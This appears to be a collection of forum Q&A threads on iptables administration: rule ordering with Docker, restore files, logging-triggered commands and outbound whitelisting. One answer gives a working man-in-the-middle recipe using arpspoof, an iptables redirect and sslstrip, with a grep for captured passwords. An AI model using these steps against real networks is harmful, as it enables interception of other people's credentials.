Since I a have iptables running on my router, it seems the only chain that works is the FORWARD chain to block traffic between the LAN and the internet.
In these FORWARD chain rules, like...
iptables -I FORWARD 1 -d 198.41.16.0/17 -j REJECT
...but since the router doesn't understand the direction of traffic, I essentially need two rules, like this...
iptables -I FORWARD 1 -d 198.41.16.0/17 -j REJECT
iptables -I FORWARD 1 -s 198.41.16.0/17 -j REJECT
Is there any way to combine them? Or am I missing something?
To my knowledge, it is not possible to have an iptables command with (effectively) an OR match in it. I expect that the only way to get your desired outcome is to do two separate statements.
Best of luck!
Related
I had to add few iptable entries into NAT table, POSTROUTING chain, to allow docker containers to access internet through a different source-address/source-interface of Host Machine (to_source).
Things are working fine.
Ex:
target prot opt source destination
SNAT all -- 100.100.8.0/22 10.1.2.3 to:100.64.0.5
But, when docker service is restarted, it inserts MASQUERADE rules on top of my entries and hence my fix as above is masked. Docker containers can't access internet now.
Ex:
target prot opt source destination
MASQUERADE all -- 100.100.8.0/22 0.0.0.0/0
SNAT all -- 100.100.8.0/22 10.1.2.3 to:100.64.0.5
Is there anyway to make my POSTROUTING rules to stay always on top of the chain even after docker restarts?
If Ubuntu is on your host, you can use the iptables-save utility to save the iptables rules to a file after you start the docker daemon. Then, once you flush the old rules, you can simply restore the original docker rules using iptables-restore & the saved rules file.
If you don't want to restore all the old iptables rules, you can alter the saved rules file to keep only the ones you need.
You can add --iptables=false to your docker daemon startup options which stops it from making changes to the iptables rules at all.
Reference:
https://docs.docker.com/engine/reference/commandline/dockerd/
It is important to create the rule at the right time - after the docker containers are up, because that's when docker creates the MASQUERADE rules.
Using cron #reboot with a delay would not be reliable, because whenever you restart a container (or bring up a new one), the rules would be in the wrong order.
My solution is a script, executed by cron, which will check the position of my rule(s) and re-insert them if/when necessary.
# we attach a unique comment to our rule so that we can check its position later
unique_comment="docker SNAT source IP"
insert_rules() {
# put your rules here. Make sure the first rule is tagged with $unique_comment so it can be identified.
sudo iptables -t nat -I POSTROUTING 1 -s 172.17.0.0/12 -j SNAT --to-source 1.2.3.4 -m comment --comment "$unique_comment"
sudo iptables -t nat -I POSTROUTING 2 -s 192.168.0.0/16 -j SNAT --to-source 1.2.3.4
}
delete_rules() {
pos=$1
# delete the first two rules from POSTROUTING. Adjust if necessary.
sudo iptables -t nat -D POSTROUTING $pos
sudo iptables -t nat -D POSTROUTING $pos
}
pos=$(sudo iptables -t nat -L POSTROUTING -v -n --line-numbers|grep "$unique_comment" | awk '{ print $1 }')
if [ "$pos" == "1" ]; then
: # correct position; nothing to do
elif [ "$pos" == "" ]; then
# rule does not exist; add it.
insert_rules
else
# rule is not first; re-insert it.
delete_rules $pos
insert_rules
fi
Now create a cron job to execute this script frequently as you need (e.g. every 1 or 2 minutes).
I'm building a firewall rule generator and i need to apply all the iptables rule atomically. The only guaranteed way to do that is to use an iptables restore file, which has it's own syntax. The only guaranteed way to generate such a file is to run the iptables commands, dump them with iptables save and restore them, which seems completely unacceptable for a live system. Is there an easier way, such as a software which will parse raw iptables rules and generate an iptables restore? I've found fwmacro, but it's not maintained, and has it's own syntax, such as:
-A 10stateful -mstate --state INVALID -j DROP
instead of
iptables -A stateful -mstate --state INVALID -j DROP
I find the easiest way to generate an iptables-restore file is to run iptables-save > rules.ipt and then edit the file with any required statements.
i am using Backtrack5 for this ..but am stuck ...i am not able to get the data i want, i am using Ettercap and SSL Strip for this...
Does any one here any idea of how to do it ?
Idk how you're doing it, but for me ettercap-gtk (the gui) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and go another route.
Let me give you some steps, starting with setting up your iptables for this attack (Man in the middle, amirite) and enabling ip_forward(ing)
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)
Now to be the man in the middle: Here we use arpspoof:
arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)
Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)
cat filename(from earlier) and even pipe | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will be filling up with captured/stripped https data.
:)
I'm wanting to be able to run a system command when an IPTable rule is hit, passing the IP address of the remote device to it.
I've had a look around but found nothing. I thought of grepping logs, but I'm expecting a lot of traffic..
Any help would be fantastic!
Thanks
(If it helps, Ubuntu Linux is my platform of choice)
Here is how you do it:
iptables -I FORWARD -p tcp --dport 80 -d a.b.c.d -j LOG --log-prefix="TRIGGER ME NOW !!!"
tail -f some-logfile | awk '/some-pattern/ {system("run-some-command")}'
Should be straight forward enough and should be able to deal with lots of traffic, the tail command should be quick enough... Just make sure the file doesn't grow too much.
Do it with knockd instead. You configure a port knocking sequence of just one port, then tell knockd the command you want to run. Normally it's used to add/remove iptables rules -- to open a service (e.g. ssh access) after a certain knock sequence, but I don't see why you couldn't just use it to run a command after a very simple, one packet on one expected port rule.
'apt-get install knockd' on your Ubuntu system and the man page has examples you can easily adapt to this.
it is actually easy.
we have 2 way to do this. If you use tail log then iptables will not depend on log result.
you can use NFQUEUE. Please read my article if you have time.
https://medium.com/#farizmuradov/useful-notes-about-nfqueue-80a2c271db1a
Same article I have added my linkedin page.
you can write simple router in application level and send data from iptables to listen port. In programming level you can execute scripts and send data again some port. Then you can continue by iptables.
I have a server in my network for which I want to DROP outbound traffic to any other host in the LAN, except for one or 2 single hosts. E.g. I want to block outbound traffic to 123.123.1.1/16, except for 123.123.10.10 and 123.123.20.20. How can I do this in IPTABLES?
I have tried something like this:
sudo iptables -D OUTPUT -d 123.123.1.1/16 ! -d 123.123.10.10 -j DROP
However I get an error that the -d operator can only be used once.
Do an ACCEPT before the DROP.
iptables -A OUTPUT -d 123.123.10.10 -j ACCEPT
iptables -A OUTPUT -d 123.123.1.1/16 -j DROP
That way once the packet matches the first rule it won't even be tested against the second.